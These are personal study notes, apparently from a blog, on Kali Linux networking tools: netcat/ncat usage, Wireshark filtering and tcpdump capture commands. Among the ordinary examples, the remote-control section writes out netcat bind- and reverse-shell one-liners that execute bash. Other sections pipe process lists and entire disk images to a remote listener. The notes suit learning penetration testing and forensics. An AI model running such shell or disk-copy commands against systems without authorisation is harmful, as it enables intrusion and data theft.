Kali linux penetration test study notes-kali linux basic tools
Here is just a brief description of the function of the tool~~
Common tools
- Often used and powerful
- An indispensable helper for security practitioners
- NC / ncat
- wireshark
- tcpdump
NETCAT - NC
- The Swiss Army Knife in Network Tools-Small Body, Great Wisdom
- Listening mode / transmission mode
- telnet / get banner information
- Transfer text messages
- Transfer files/directories
- Encrypted transfer of files
- Remote control / Trojan horse
- Encrypt all traffic
- flow media services
- Clone hard disk remotely
NC —— telnet / banner
nc -h 查看参数的使用 -v显示详细的信息 -n跟一个ip
客户端连接服务器端口,可以看到banner信息
nc -nv 1.1.1.1 110 110端口为POP3(邮件协议3)服务开放的
nc -nv 1.1.1.1 25 25端口为SMTP服务器所开放,主要用于发送邮件
nc -nv 1.1.1.1 80 80端口是为HTTP超文本传输协议开放的
NC —— Transmit text information
比如说简单实现两个人来聊天等~~
A:nc -l -p 4444 其中一台开放一个端口,-l侦听一个端口,-p打开一个端口
B:nc -nv 1.1.1.1 4444 另一台作为客户端连接开放的端口
一端终止,两边都终止
远程电子取证
尽量少的修改被审计计算机文件的内容,避免破坏证据
在本机监听并开放端口,在取证的计算机上执行nc操作
本机:nc -l -p 4444
需取证的计算机:ls -l | nc -nv 1.1.1.1 4444
即可在本机显示取证计算机的文件目录,也就是远程电子取证的信息收集
本机:nc -l -p 4444 > ps.txt 把文件传来的信息存到ps.txt中
需取证的计算机:ps aux | nc -nv 1.1.1.1 4444 -q 1 -q执行后等一秒钟,断开连接
这里主要是通过nc来收集电子取证的一些信息
NC —— transfer files/directories
传输文件
接收端打开端口:
A:nc -lp 333 > 1.mp4 接收端口内容>输出到1.MP4中
B:nc -nv 1.1.1.1 333 < 1.mp4 -q 1 <输入到nc的端口里面
或者
发送端打开端口
A:nc -q 1 -lp 333 < 1.mp4
B:nc -nv 1.1.1.1 333 > 1.mp4 按下回车就会建立连接
传输目录
先打包再传输~
A:tar -cvf - music/ | nc -lp 333 -q 1
B:nc -nv 1.1.1.1 333 | tar -xvf - 目录从A到B
加密传输文件
A:nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4
B: mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q 1
加密方式和解密方式必须得对应
NC —— Streaming Media Service
A:cat 1.mp4 | nc -lp 333
B:nc -nv 1.1.1.1 333 | mplayer -vo x11 -cache 3000 -
NC —— Port Scan
nc -nvz 1.1.1.1 1-65535
nc -vnzu 1.1.1.1 1-1024 UDP开放端口
不如nmap强大,功能也没有那么多
NC —— Remote Clone Hard Disk
A: nc -lp 333 | dd of=/dev/sda
B: dd if=/dev/sda | nc -nv 1.1.1.1 333 –q 1
远程电子取证,可以将目标服务器硬盘远程复制,或者内存
完完全全复制到一个新的硬盘上去,一模一样
NC-remote control
正向:
A:nc -lp 333 -c bash 连接建立之后,执行一个shell脚本
B:nc 1.1.1.1 333 连接之后可执行bash命令控制A
反向:
A:nc -lp 333 连接之后可执行bash命令控制B
B:nc 1.1.1.1 333 -c bash 被控制
有点像qq上的远程控制~~
注:windows用户把bash改成cmd
NC —— NCAT (kali2.0 seems to have this command~)
NC缺乏加密和身份验证的能力,数据都是以明文形式进行传输,可以被进行ARP欺骗,被嗅探等,
同时也缺乏身份验证,开放的端口容易被别人扫描到,被别人利用~
NCAT弥补了NC缺乏加密和身份验证的能力
NCAT包含于nmap工具包中
A:ncat ncat -c bash -allow 192.168.20.14 -vnl 333 -ssl
-allow只允许哪一个ip连接,-ssl加密
B:ncat -nv 1.1.1.1 333 -ssl
-ssl保证两边加解密方式一样
传输的数据都是被加密的,因为管道本身就是被加密的,嗅探抓包是看不见传输内容的!
实现方式与NC有本质的区别!!!基于IP地址的身份验证!!!
nc虽然强大,但是有很多的版本,不同系统 / 平台的nc参数功能不尽相同,
例如ubuntu的nc中没有-c这个参数,所以在不同平台使用时注意参数和命令的不同之处
WIRESHARK
- Analysis of packet sniffing protocol
- Essential skills for security experts
- Capture engine
- Libpcap9——Linux
- Winpacap10——Windows
- Decoding ability
WIRESHARK-Basic usage
- The simple method of use is as follows:
- start up
- Select the packet capture network card, you can also filter
- To implement packet capture, double-click the network card, or as follows:
- To save and analyze the captured file, stop first:
If you want to continue the analysis after saving, drag it directly to view:
- Preferences
can be personalized settings:
for example, add two columns, source MAC address, destination MA address:
WIRESHARK-filter
- Filter out interfering packets
- The packet capture filter is
similar to the display filter, except that it filters at the beginning:
- Display filter
can filter different packages according to different conditions
ip.addr == 192.168.1.122 //根据IP地址筛选,包括源ip或者目的IP
ip.src == 192.168.1.122 //根据源IP地址筛选
ip.dst == 192.168.1.122 //根据目的IP地址筛选
...........
WIRESHARK-common protocol package
- The hierarchical structure of the data packet: the protocol can be clearly observed through the hierarchical structure
- ARP
- ICMP—— ping包
- TCP-three-way handshake
- UDP
- DNS
- HTTP
- FTP
WIRESHARK ——TCP style
- Right click to track TCP flow~~~
- Data flow: tracking to view detailed data
- HTTP-clear text transmission
- SMTP
- POP3
- SSL-ciphertext transmission
- …
WIRESHARK —— Information Statistics
Located:
You can view the following information:
- Number of nodes
- Protocol analysis
- Packet size distribution
- Session connection
- Decoding method
- expert system
- Generally, there are thousands of packets captured. When finding abnormalities, we basically start with information statistics. This makes it easier and faster to find abnormal traffic, which is much more efficient than one by one! ! !
WIRESHARK-Practice
- Capture packets and compare nc and ncat encrypted and unencrypted traffic
- Under nc:
Poor my kali seems to have no ncat command,,,,,
and did not find a solution,,,, I also take it, is it only available in kali1? ?
I hope anyone who knows will tell me, thank you! !
Needless to say, anyway, when using ncat, the captured data is encrypted, so it is difficult to see the plaintext! ! ! !
TCPDUMP
- No-GUI packet capture analysis tool
- Installed by default on Linux and Unix systems
- Unlike wireshark, it is not a graphical interface
TCPDUMP-packet capture
- Capture
- Only capture 68 bytes by default
- tcpdump -i eth0 -s 0 -w file.pcap -s means how big the catch is, 0 means how big the catch is, -w saves the file
- tcpdump -i eth0 port 22 is equivalent to filtering and only captures port 22 packets
- Read the capture file
- tcpdump -r file.pacp
TCPDUMP-Screening
- tcpdump -n -r http.cap | awk ‘{print $3}’| sort –u
- tcpdump -n src host 145.254.160.237 -r http.cap According to the source IP display
- tcpdump -n dst host 145.254.160.237 -r http.cap According to the target ip display
- tcpdump -n port 53 -r http.cap displays the content of port 53
- tcpdump -nX port 80 -r http.cap hexadecimal mode displays port 80 content
TCPDUMP-advanced filtering
- tcpdump -A -n'tcp[13] = 24' -r http.cap displays the packet with the 13th byte as 24